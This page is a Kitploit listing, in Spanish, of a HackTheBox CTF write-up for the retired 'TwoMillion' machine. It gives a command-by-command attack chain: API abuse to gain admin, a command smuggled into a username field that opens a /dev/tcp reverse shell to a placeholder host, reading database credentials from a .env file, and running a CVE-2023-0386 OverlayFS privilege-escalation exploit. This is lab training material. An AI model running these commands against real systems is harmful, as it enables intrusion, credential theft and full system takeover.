Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
HTB-TwoMillion-Writeup — Informe de la máquina TwoMillion de HackTheBox — abuso de API, inyección de comandos y CVE-2023-0386 | Kitploit
Herramientas/GitHubGitHub/karimelsheikh1/htb-twomillion-writeup
Escalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónMovimiento LateralExplotación de Aplicaciones WebPost-ExplotaciónCTFPruebas de Penetración

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Comando y Control
Aprendizaje y Educación
GitHubkarimelsheikh1/htb-twomillion-writeup

HTB-TwoMillion-Writeup

Informe de la máquina TwoMillion de HackTheBox — abuso de API, inyección de comandos y CVE-2023-0386

Ver Repositorio
hace 3 mesesAún no revisado

HTB-TwoMillion-Writeup

Writeup de la máquina TwoMillion de HackTheBox — Abuso de API, inyección de comandos y CVE-2023-0386

HackTheBox — Writeup de TwoMillion

HackTheBox — Writeup de TwoMillion

HTB Difficulty OS

Información de la máquina

CampoDetalles
NombreTwoMillion
DificultadFácil
SOLinux
IP10.10.11.221
CVECVE-2023-0386

Resumen

TwoMillion es una máquina Linux de dificultad Fácil ambientada en la antigua plataforma HackTheBox. Implica decodificar un código de invitación, abusar de endpoints de API, inyección de comandos en el SO, descubrimiento de credenciales y una escalada de privilegios del kernel de Linux mediante CVE-2023-0386 (OverlayFS).


Enumeración

Nmap

root@kitploit:~
nmap -sV -sC -v 10.10.11.221

Puertos abiertos:

  • 22 — OpenSSH 8.9p1
  • 80 — HTTP nginx → redirige a 2million.htb

Agregar a /etc/hosts:

root@kitploit:~
echo "10.10.11.221 2million.htb" >> /etc/hosts

Paso 1 — Código de invitación

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/how/to/generate

La respuesta está codificada en ROT13. Decodifícala:

root@kitploit:~
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'

Genera el código de invitación:

root@kitploit:~
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d

Regístrate en http://2million.htb/register usando el código de invitación decodificado.


Paso 2 — Abuso de API → Administrador

Inicia sesión en el navegador, obtén PHPSESSID de las cookies (F12 → Aplicación → Cookies).

Escala a administrador:

root@kitploit:~
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"email":"[email protected]","is_admin":1}'

Verifica:

root@kitploit:~
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}

Paso 3 — Inyección de comandos → Reverse Shell

Inicia el listener:

root@kitploit:~
nc -lvnp 4444

Envía el payload de reverse shell:

root@kitploit:~
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
  -b "PHPSESSID=<your_session>" \
  -H "Content-Type: application/json" \
  --data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'

Shell recibida como www-data.


Paso 4 — Flag de usuario

Encuentra credenciales en .env:

root@kitploit:~
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123

Accede por SSH:

root@kitploit:~
ssh [email protected]
cat ~/user.txt

Paso 5 — Flag de root (CVE-2023-0386)

Revisa la pista:

root@kitploit:~
cat /var/mail/admin
uname -r
# 5.15.70 — vulnerable a CVE-2023-0386

Descarga y compila el exploit en Kali:

root@kitploit:~
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all

Transfiere al objetivo:

root@kitploit:~
# Kali
python3 -m http.server 8000

# Objetivo
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all

Ejecuta en dos terminales en el objetivo:

Terminal 1:

root@kitploit:~
./fuse ./ovlcap/lower ./gc

Terminal 2:

root@kitploit:~
./exp

Obtén la flag de root:

root@kitploit:~
cat /root/root.txt

Cadena de ataque


Herramientas utilizadas

  • Nmap
  • curl
  • Netcat
  • CVE-2023-0386 PoC

Este writeup es solo con fines educativos en una máquina retirada de HackTheBox.

Descargar herramienta
PasoTécnica
ReconocimientoEscaneo Nmap
Código de invitaciónDecodificación ROT13 + Base64
Escalada webManipulación de API → administrador
Shell inicialInyección de comandos en el SO
Movimiento lateralCredenciales .env → SSH
RootExploit CVE-2023-0386 OverlayFS